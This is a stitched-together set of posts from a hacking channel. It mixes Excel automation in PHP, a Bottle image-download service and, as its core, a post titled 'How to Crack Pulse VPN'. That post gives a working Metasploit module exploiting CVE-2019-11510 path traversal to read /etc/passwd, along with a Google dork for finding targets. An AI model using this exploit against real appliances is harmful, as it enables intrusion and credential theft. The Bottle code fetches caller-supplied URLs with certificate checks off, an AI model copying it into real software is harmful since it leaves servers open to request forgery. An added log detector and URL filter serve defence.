UNDERCODE COMMUNITY
🦑 PHP4 COM function (Windows version): FULL
PART 4
twitter.com/UNDERCODETC

🦑 𝕃𝔼𝕋𝕊 𝕊𝕋𝔸ℝ𝕋 :

";

# Open the workbook so that we can use it
$wkb = $ex->application->Workbooks->Open($workbook) or die("Did not open");

# Pre-save the original workbook: create a copy of the workbook
$ex->Application->
# $ex->Application->Visible = 1; # Uncomment this line to make Excel visible

# Read and write a cell in the new worksheet
# We read cell E11 (Advertising in the 4th Quarter)
$sheets = $wkb->Worksheets($sheet);   # Select the sheet
$sheets->activate;                    # Activate it
$cell = $sheets->Cells(11, 5);        # Select the cell (row, column number)
$cell->activate;                      # Activate the cell
print "Old Value = {$cell->value}\n"; # Print the value of the cell: 10000
$cell->value = 15000;                 # Change it to 15000
print "New value = {$cell->value}\n"; # Print the new value = 15000

# Finally, recalculate this cell with the new value
$sheets->Calculate;                   # Needed only when the calculation option is manual
# See the effect on the total (cell E13)
$cell = $sheets->Cells(13, 5);        # Select the cell (row, column number)
$number = number_format($cell->value);
print "New Total cost = \$$number - was \$47,732 before.\n";
# Because of the cell formula, the advertising affects the company's expenses; this displays $57,809

# Using an Excel built-in function
# PMT(percent / 12 months, number of payments, loan amount)
$pay = $ex->application->pmt(0.08 / 12, 10, 10000);
$pay = sprintf("%.2f", $pay);
print "Monthly payment for \$10,000 loan @ 8% interest / 10 months: \$ $pay\n";
# Should print monthly payment = $ -1,037.03

# Optionally, save
$ex->Application->ActiveWorkbook->SaveAs("Ourtest");
# Close without asking
$ex->application->ActiveWorkbook->Close("False");
unset($ex);

?>

Written by UndercOde
▁ ▂ ▄ u𝕟𝔻Ⓔ𝐫Ć𝔬𝓓ⓔ ▄ ▂ ▁

🦑 How to Crack Pulse VPN, Latest CVE, Tested by UNDERCODE?
t.me/undercodeTesting

🦑 𝕃𝔼𝕋𝕊 𝕊𝕋𝔸ℝ𝕋 :

1) LOAD THIS MODULE VIA METASPLOIT:

# Exploit Title: File disclosure in Pulse Secure SSL VPN (metasploit)
# Google Dork: inurl:/dana-na/ filetype:cgi
# Exploit Author: 0xDezzy (Justin Wagner), Alyssa Herrera
# Vendor Homepage: https://pulsesecure.net
# Version: 8.1R15.1, 8.2 before 8.2R12.1, 8.3 before 8.3R7.1, and 9.0 before 9.0R3.4

require 'msf/core'
class MetasploitModule < Msf::Auxiliary
  include Msf::Exploit::Remote::HttpClient
  include Msf::Post::File
  def initialize(info = {})
    super(update_info(info,
      'Name' => 'Pulse Secure - System file leak',
      'Description' => %q{
        Pulse Secure SSL VPN file disclosure via specially crafted HTTP resource requests.
        This exploit reads /etc/passwd as a proof of concept
        This vulnerability affect ( 8.1R15.1, 8.2 before 8.2R12.1, 8.3 before 8.3R7.1, and 9.0 before 9.0R3.4
      },
      'References' =>
        [
          [ 'URL', 'http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-11510' ]
        ],
      'Author' => [ '0xDezzy (Justin Wagner), Alyssa Herrera' ],
      'License' => MSF_LICENSE,
      'DefaultOptions' =>
        {
          'RPORT' => 443,
          'SSL' => true
        },
    ))

  end


  def run()
    print_good("Checking target...")
    res = send_request_raw({'uri'=>'/dana-na/../dana/html5acc/guacamole/../../../../../../etc/passwd?/dana/html5acc/guacamole/'},1342)

    if res && res.code == 200
      print_good("Target is Vulnerable!")
      data = res.body
      current_host = datastore['RHOST']
      filename = "msf_sslwebsession_"+current_host+".bin"
      File.delete(filename) if File.exist?(filename)
      file_local_write(filename, data)
      print_good("Parsing file.......")
      parse()
    else
      if(res && res.code == 404)
        print_error("Target not Vulnerable")
      else
        print_error("Ooof, try again...")
      end
    end
  end
  def parse()
    current_host = datastore['RHOST']

    fileObj = File.new("msf_sslwebsession_"+current_host+".bin", "r")
    words = 0
    while (line = fileObj.gets)
      printable_data = line.gsub(/[^[:print:]]/, '.')
      array_data = printable_data.scan(/.{1,60}/m)
      for ar in array_data
        if ar != "............................................................"
          print_good(ar)
        end
      end
      #print_good(printable_data)

    end
    fileObj.close
  end
end
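
On the defending side, the request this module sends leaves a distinctive trace in the appliance's or a fronting proxy's access log. The following Python sketch is an added example, not part of the original post or of the module: it flags requests that start under /dana-na/ and whose path resolves outside the application roots. The log format, the sample lines and the verdict names are constructed assumptions.

```python
import posixpath
import re
from urllib.parse import unquote, urlsplit

# Constructed sample access-log lines (combined-log style); not real traffic.
SAMPLE_LOG = """\
198.51.100.7 - - [10/Sep/2019:10:01:02 +0000] "GET /dana-na/auth/url_default/welcome.cgi HTTP/1.1" 200 5120
203.0.113.9 - - [10/Sep/2019:10:01:05 +0000] "GET /dana-na/../dana/html5acc/guacamole/../../../../../../etc/passwd?/dana/html5acc/guacamole/ HTTP/1.1" 200 1811
192.0.2.44 - - [10/Sep/2019:10:01:09 +0000] "GET /dana-na/../dana/html5acc/guacamole/../../../../../../etc/passwd?/dana/html5acc/guacamole/ HTTP/1.1" 404 0
198.51.100.7 - - [10/Sep/2019:10:02:00 +0000] "GET /dana-na/auth/../css/ds.css HTTP/1.1" 200 900
"""

LINE_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[[^\]]+\] "(?P<method>\S+) (?P<target>\S+) [^"]*" (?P<status>\d{3})'
)
APP_ROOTS = ("/dana-na/", "/dana/")  # URL prefixes that appear in the module's request


def escaped_path(target):
    """Return the path a traversal request resolves to, or None if it stays in the app."""
    path = unquote(urlsplit(target).path)      # normalise percent-encoding before inspecting
    if not path.startswith("/dana-na/") or ".." not in path.split("/"):
        return None
    resolved = posixpath.normpath(path)        # collapse the ../ segments
    return None if (resolved + "/").startswith(APP_ROOTS) else resolved


def scan(log_text):
    """Return (client_ip, resolved_path, verdict) for each suspicious request."""
    findings = []
    for line in log_text.splitlines():
        m = LINE_RE.match(line)
        if not m:
            continue
        resolved = escaped_path(m["target"])
        if resolved is None:
            continue
        # The module treats HTTP 200 as "vulnerable" and 404 as "not vulnerable".
        verdict = "FILE_RETURNED" if m["status"] == "200" else "ATTEMPT"
        findings.append((m["ip"], resolved, verdict))
    return findings


if __name__ == "__main__":
    for finding in scan(SAMPLE_LOG):
        print(*finding)
```

A FILE_RETURNED hit means the appliance answered the traversal with content, so it should be handled as a disclosure on an unpatched version rather than as a blocked probe.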
▁ ▂ ▄ u𝕟𝔻Ⓔ𝐫Ć𝔬𝓓ⓔ ▄ ▂ ▁

🦑 Bottle deployment method for a web service, and Postman interface testing:

Bottle is a fast, concise, and lightweight WSGI-based micro web framework. The framework consists of a single .py file and depends on nothing except the Python standard library.


from bottle import route, request, run
import logging
import requests
import cv2
import numpy as np

logger = logging.getLogger(__name__)

@route('/testimg', method='POST')
def testimg():
    try:
        # Query-string parameters (params)
        result = {}
        result["name"] = request.query.name
        result["nums"] = request.query.nums

        # JSON body
        #print(request.json)
        urllist = request.json["urllist"]
        #print(type(urllist))
        #print(urllist)
        imgPath = []
        for i in range(len(urllist)):
            imgPath.append(urllist[i])

        for i in range(len(imgPath)):
            #print(imgPath[i])
            # Download each URL; verify=False disables TLS certificate validation
            rev = requests.get(imgPath[i], verify=False)  # , timeout=config.timeout
            # Decode the downloaded bytes into an image
            img = cv2.imdecode(np.frombuffer(rev.content, np.uint8), cv2.IMREAD_COLOR)
            rec = 0

        return str(rec)
    except BaseException as e:
        logger.exception(e)
        return str(0)

if __name__ == "__main__":
    run(host='172.17.0.2', port=49166, debug=False)

Postman interface test:

Params passes the query parameters.

The body carries text data such as JSON.

@Phenicia
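
The handler above downloads every URL the caller puts in urllist, from inside the network the service runs on and with certificate checks switched off. The following Python check is an added example, not code from the original post: it vets each urllist entry before any fetch. The HTTPS-only policy, the function names and the FAKE_DNS table are constructed assumptions.

```python
import ipaddress
import socket
from urllib.parse import urlsplit

ALLOWED_SCHEMES = {"https"}  # assumption: images are only fetched over HTTPS

# Constructed name-to-address table so the example runs offline.
FAKE_DNS = {
    "images.example.com": {"93.184.216.34"},
    "build.example.com": {"172.17.0.2"},  # the Bottle host's own network
    "mixed.example.com": {"93.184.216.34", "127.0.0.1"},
}


def fake_resolver(host):
    if host not in FAKE_DNS:
        raise OSError("unknown host")
    return FAKE_DNS[host]


def system_resolver(host):
    """Every address the operating system resolves the host name to."""
    return {info[4][0] for info in socket.getaddrinfo(host, None)}


def check_image_url(url, resolver=system_resolver):
    """Return (ok, reason) for one entry of the request's urllist."""
    parts = urlsplit(url)
    if parts.scheme not in ALLOWED_SCHEMES:
        return False, "scheme not allowed"
    if not parts.hostname or parts.username or parts.password:
        return False, "missing host or embedded credentials"
    try:
        addresses = resolver(parts.hostname)
    except OSError:
        return False, "host does not resolve"
    for addr in addresses:
        ip = ipaddress.ip_address(addr.split("%")[0])  # drop any IPv6 zone id
        if not ip.is_global:  # private, loopback, link-local, reserved
            return False, f"non-public address {ip}"
    return True, "ok"


def filter_urllist(urllist, resolver=system_resolver):
    """Split urllist into fetchable URLs and rejected (url, reason) pairs."""
    accepted, rejected = [], []
    for url in urllist:
        ok, reason = check_image_url(url, resolver)
        if ok:
            accepted.append(url)
        else:
            rejected.append((url, reason))
    return accepted, rejected
```

Accepted URLs should then be fetched with `requests.get(url, timeout=..., allow_redirects=False)` and certificate verification left at its default. The check does not cover a host name whose DNS answer changes between the check and the fetch.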

▁ ▂ ▄ u𝕟𝔻Ⓔ𝐫Ć𝔬𝓓ⓔ ▄ ▂ ▁